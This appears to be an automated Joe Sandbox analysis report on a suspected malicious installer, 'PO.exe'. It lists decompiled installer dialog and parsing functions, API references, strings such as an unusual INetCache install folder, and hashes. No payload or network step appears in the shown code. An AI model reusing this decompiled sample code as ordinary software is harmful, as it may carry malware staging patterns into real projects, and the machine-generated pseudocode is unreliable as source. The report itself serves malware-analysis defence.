					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42370c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004061A0(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404242(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404242(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a26c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x423720 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x423720 + _t316 * 4) = _t276;
									_t284 =  *( *0x423720 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a26c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404277(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404277(_v12);
								L91:
								return E004042A9(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404c68
0x00404c79
0x00404c7e
0x00404c86
0x00404c8c
0x00404c94
0x00404ca2
0x00404ca5
0x00404ec6
0x00404ecd
0x00404ee1
0x00404ecf
0x00404ed1
0x00404ed4
0x00404ed5
0x00404edc
0x00404edc
0x00404eed
0x00404efb
0x00404efe
0x00404f14
0x00404f89
0x00404f8c
0x00404f8e
0x00404f98
0x00404fa6
0x00404fa6
0x00404fa8
0x00404fb2
0x00404fb8
0x00404fbb
0x00404fbe
0x00404fd9
0x00404fc0
0x00404fca
0x00404fca
0x00404fbe
0x00404fb2
0x00000000
0x00404f8c
0x00404f19
0x00404f24
0x00404f29
0x00404f30
0x00404f35
0x00404f39
0x00404f44
0x00404f44
0x00404f48
0x00404f4c
0x00404f50
0x00404f63
0x00404f52
0x00404f52
0x00404f59
0x00404f5f
0x00404f5b
0x00404f5b
0x00404f5b
0x00404f59
0x00404f67
0x00404f69
0x00404f7c
0x00404f7f
0x00404f82
0x00404f82
0x00404f4c
0x00000000
0x00404f39
0x00404f1b
0x00404f22
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404fdc
0x00404fdc
0x00404fe3
0x00405054
0x0040505c
0x00405064
0x00405064
0x0040506d
0x0040506f
0x00405076
0x00405079
0x00405079
0x0040507f
0x00405086
0x00405089
0x00405089
0x0040508f
0x00405095
0x0040509b
0x0040509b
0x004050a8
0x004051fe
0x00405205
0x00405222
0x00405228
0x0040523a
0x0040523a
0x00000000
0x004050ae
0x004050b0
0x004050b5
0x004050ba
0x004050bf
0x004050c1
0x004050c1
0x004050c2
0x004050c3
0x004050c5
0x004050c5
0x004050cd
0x0040510e
0x00405110
0x00405120
0x00405123
0x00405128
0x0040512f
0x00405132
0x004051d4
0x004051da
0x004051e8
0x004051f9
0x004051f9
0x00000000
0x004051e8
0x00405138
0x0040513b
0x00405141
0x00405146
0x00405148
0x0040514a
0x00405150
0x00405157
0x0040515c
0x00405163
0x00405166
0x00405166
0x0040516d
0x00405179
0x0040517d
0x0040517f
0x0040517f
0x0040516f
0x00405171
0x00405171
0x0040519f
0x004051ab
0x004051ba
0x004051ba
0x004051bc
0x004051bf
0x004051c8
0x00000000
0x004050cf
0x004050da
0x004050dd
0x004050e2
0x004050e4
0x004050e8
0x004050f8
0x00405102
0x00405104
0x00405107
0x00000000
0x00000000
0x00000000
0x00000000
0x004050ea
0x004050ea
0x004050f0
0x004050f2
0x004050f2
0x004050f3
0x004050f4
0x00000000
0x004050ea
0x004050cd
0x004050a8
0x00404feb
0x00000000
0x00405001
0x0040500b
0x00405010
0x00000000
0x00000000
0x00405022
0x00405027
0x00405033
0x00405033
0x00405035
0x00405044
0x00405046
0x0040504a
0x0040504d
0x00000000
0x0040504d
0x00404feb
0x00404cab
0x00404cb0
0x00404cb9
0x00404cc0
0x00404cce
0x00404cd9
0x00404cdf
0x00404ced
0x00404d01
0x00404d06
0x00404d13
0x00404d18
0x00404d2e
0x00404d3f
0x00404d4c
0x00404d4c
0x00404d4f
0x00404d55
0x00404d57
0x00404d5a
0x00404d5f
0x00404d64
0x00404d66
0x00404d66
0x00404d86
0x00404d86
0x00404d88
0x00404d89
0x00404d8e
0x00404d91
0x00404d94
0x00404d98
0x00404d9d
0x00404da2
0x00404da6
0x00404dab
0x00404db0
0x00404db2
0x00404dba
0x00404e85
0x00404e98
0x00000000
0x00404dc0
0x00404dc3
0x00404dc6
0x00404dc9
0x00404dc9
0x00404dd0
0x00404dd6
0x00404dd9
0x00404ddf
0x00404de0
0x00404de5
0x00404dee
0x00404df5
0x00404df8
0x00404dfb
0x00404dfe
0x00404e3a
0x00404e63
0x00404e3c
0x00404e49
0x00404e49
0x00404e00
0x00404e03
0x00404e12
0x00404e1c
0x00404e24
0x00404e2b
0x00404e33
0x00404e33
0x00404dfe
0x00404e69
0x00404e6a
0x00404e76
0x00404e76
0x00404e83
0x00404e9e
0x00404ea2
0x00404ebf
0x00404ec4
0x00000000
0x00404ea4
0x00404ea9
0x00404eb2
0x0040523c
0x0040524e
0x0040524e
0x00404ea2
0x00000000
0x00404e83
0x00404dba

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C71
GetDlgItem.USER32(?,00000408), ref: 00404C7C
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
LoadBitmapW.USER32(0000006E), ref: 00404CD9
SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
DeleteObject.GDI32(00000000), ref: 00404D4F
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
ShowWindow.USER32(?,00000005), ref: 00404EA9
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
ImageList_Destroy.COMCTL32(?), ref: 00405079
GlobalFree.KERNEL32(?), ref: 00405089
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
InvalidateRect.USER32(?,00000000,00000001), ref: 004051DA
ShowWindow.USER32(?,00000000), ref: 00405228
GetDlgItem.USER32(?,000003FE), ref: 00405233
ShowWindow.USER32(00000000), ref: 0040523A

Strings

M, xrefs: 00404E03
N, xrefs: 00404EE4
, xrefs: 00405212

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
Instruction ID: ce840dee0c3a5b827351c7f25dbf2e3605d0905f5c54158640504e6bfb71dde6
Opcode Fuzzy Hash: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
Instruction Fuzzy Hash: 4C023EB0A00209EFDF209F64CD45AAE7BB5FB84355F10817AE610BA2E1C7799D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046DD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004046DD(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422700; // 0x6aca44
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xb) + 0x42b000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E004058A7(0x3fb, _t146);
					E00406412(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004058A7(0x3fb, _t146);
							if(E00405C3A(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040617E(0x4216f8, _t146);
							_t87 = E00406558(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040617E(0x4216f8, _t146);
								_t89 = E00405BDD(0x4216f8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216f8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B7E(0x4216f8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216f8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B7A(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
									E00404B62(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216e8);
									} else {
										E00404A99(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404264(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423718 == _t158) {
									E00404672();
								}
								 *0x423718 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423728;
							_v60 = E00404A33;
							_v56 = _t146;
							_v68 = E004061A0(_t146, 0x423728, _t167, 0x421f00, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B32(_t146);
								_t125 =  *((intOrPtr*)( *0x42a250 + 0x11c));
								if( *((intOrPtr*)( *0x42a250 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes") {
									E004061A0(_t146, 0x423728, _t167, 0, _t125);
									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
										lstrcatW(_t146, 0x4281e0);
									}
								}
								 *0x423718 =  *0x423718 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405BA9(_t146) != 0 && E00405BDD(_t146) == 0) {
						E00405B32(_t146);
					}
					 *0x429218 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404242(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404242(_t167);
					E00404277(_t166);
					_t138 = E00406558(6);
					if(_t138 == 0) {
						L53:
						return E004042A9(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x004046dd
0x004046e3
0x004046e9
0x004046ed
0x004046f0
0x004046f6
0x00404704
0x00404707
0x0040470f
0x00404715
0x00404715
0x00404721
0x00404724
0x00404792
0x00404799
0x00404870
0x00404877
0x00404886
0x00404886
0x0040488a
0x00404894
0x004048a1
0x004048a3
0x004048a3
0x004048b1
0x004048b8
0x004048bf
0x004048c2
0x004048fe
0x00404900
0x00404906
0x0040490b
0x0040490f
0x00404911
0x00404911
0x0040492d
0x00000000
0x0040492f
0x00404932
0x00404940
0x00404946
0x00404947
0x0040494a
0x0040494d
0x00000000
0x0040494d
0x004048c4
0x004048c6
0x004048ca
0x00000000
0x00000000
0x00000000
0x00000000
0x004048cc
0x004048cc
0x004048d9
0x004048de
0x00000000
0x00000000
0x004048e2
0x004048e4
0x004048e4
0x004048ed
0x004048ef
0x004048f4
0x004048f7
0x004048fc
0x00000000
0x00000000
0x00000000
0x00000000
0x004048fc
0x00404959
0x00404963
0x00404966
0x00404969
0x00404970
0x00404970
0x00404972
0x00404972
0x00404977
0x00404979
0x00404981
0x00404988
0x0040498a
0x00404995
0x00404995
0x0040498a
0x004049a5
0x004049af
0x004049b7
0x004049d2
0x004049b9
0x004049c2
0x004049c2
0x004049b7
0x004049d7
0x004049dc
0x004049e1
0x004049ea
0x004049ea
0x004049f3
0x004049f5
0x004049f5
0x00404a01
0x00404a09
0x00404a13
0x00404a13
0x00404a18
0x00000000
0x00404a18
0x004048c2
0x00404879
0x00404880
0x00000000
0x00000000
0x00000000
0x00404880
0x0040479f
0x004047a8
0x004047c2
0x004047c7
0x004047d1
0x004047d8
0x004047e4
0x004047e7
0x004047ea
0x004047f1
0x004047f9
0x004047fc
0x00404800
0x00404807
0x0040480f
0x00404869
0x00404811
0x00404812
0x00404819
0x00404823
0x0040482b
0x00404838
0x0040484c
0x00404850
0x00404850
0x0040484c
0x00404855
0x00404862
0x00404862
0x0040480f
0x00000000
0x004047c7
0x004047b5
0x00000000
0x00000000
0x004047bb
0x00000000
0x00404726
0x00404733
0x0040473c
0x00404749
0x00404749
0x00404750
0x00404756
0x0040475f
0x00404762
0x00404765
0x0040476d
0x00404770
0x00404773
0x00404779
0x00404780
0x00404787
0x00404a1e
0x00404a30
0x0040478d
0x00404790
0x00000000
0x00404790
0x00404787

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040472C
SetWindowTextW.USER32(00000000,-0042B000), ref: 00404756
SHBrowseForFolderW.SHELL32(?), ref: 00404807
CoTaskMemFree.OLE32(00000000), ref: 00404812
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,-0042B000), ref: 00404844
lstrcatW.KERNEL32(-0042B000,Call), ref: 00404850
SetDlgItemTextW.USER32(?,000003FB,-0042B000), ref: 00404862

Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA

Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77373420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
Part of subcall function 00406412: CharNextW.USER32(?,00000000,77373420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
Part of subcall function 00406412: CharPrevW.USER32(?,?,77373420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,-0042B000,00000001,004216F8,-0042B000,-0042B000,000003FB,-0042B000), ref: 00404925
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940

Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-0042B000), ref: 00404B3A
Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes, xrefs: 0040482D
A, xrefs: 00404800
(7B, xrefs: 004047DA
Call, xrefs: 0040483E, 00404843, 0040484E

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes$Call
API String ID: 2624150263-1122352969
Opcode ID: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
Instruction ID: d5aaf60bd55b21875b9c8b9a8d0b3d7e01f34e6f89f3adcbdcc63617e1d21faf
Opcode Fuzzy Hash: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
Instruction Fuzzy Hash: B7A191F1A00209ABDB11AFA5CC45AAF77B8EF84354F10847BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t319 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
